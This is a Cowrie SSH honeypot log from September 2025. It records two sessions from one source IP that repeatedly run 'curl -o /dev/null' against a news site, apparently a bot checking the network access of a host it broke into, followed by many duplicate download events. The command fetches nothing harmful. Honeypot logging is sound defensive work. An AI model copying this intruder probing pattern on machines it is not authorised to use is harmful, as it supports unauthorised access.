{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.872279Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.875664Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.879879Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.884330Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.888456Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.891817Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.894023Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.897847Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.900152Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.902842Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.905241Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.907399Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.909477Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.911876Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.936994Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.940296Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.948582Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.949793Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.953936Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.955213Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.958754Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.971118Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.972759Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:50.987690Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.988798Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.992654Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:50.998527Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.002249Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.005373Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.010579Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.011649Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.014095Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.020189Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.024026Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.026139Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.029384Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.031827Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.033684Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.037230Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.040255Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.044721Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.047249Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.049803Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.052503Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.054849Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.057522Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.059983Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.062577Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.066441Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.067203Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.072029Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.072879Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.077050Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.079794Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.082428Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
